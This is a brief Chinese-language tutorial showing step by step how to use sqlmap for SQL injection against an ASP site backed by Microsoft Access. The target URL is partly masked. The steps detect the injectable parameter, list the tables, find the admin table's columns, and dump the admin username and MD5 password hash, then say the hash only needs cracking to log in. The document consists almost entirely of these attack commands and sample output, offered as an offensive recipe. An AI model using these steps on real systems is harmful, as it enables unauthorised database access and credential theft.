使用sqlmap工具進行Acces注入:
1.判斷一個url是否存在注入點,根據返回數據判斷數據庫類型:
.sqlmap.py -u "http://abcd****efg.asp?id=7"
假設返回內容如下:
------------------------- [INFO] resuming back-end DBMS 'microsoft access' -------------------------
2.猜數據庫表,輸入:
.sqlmap.py -u "http://abcd****efg.asp?id=7" --tables
3.輸入線程:10,回車后開始跑表,找到合適的表后,按下ctrl+c終止跑表。
假設找到這幾個表:admin mark province vote
------------------------------------------- [ 4 tables] +----------------------+ admin mark province vote +----------------------+
4.對admin表的字段進行猜解:
.sqlmap.py -u "http://abcd****efg.asp?id=7" --tables --columns -T admin
假設找到admin表的字段如下: id username password
--------------------------------- [INFO] retrieved: id [INFO] retrieved: username [INFO] retrieved: password ----------------------------------
5.對字段內容進行猜解:
.sqlmap.py -u "http://abcd****efg.asp?id=7" --dump -T admin -C "username,password"
獲取結果假設為:
+---------------------------------+ username | admin +---------------------------------+ password | 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文) +---------------------------------+
賬號:admin 密碼:將密文解密即可。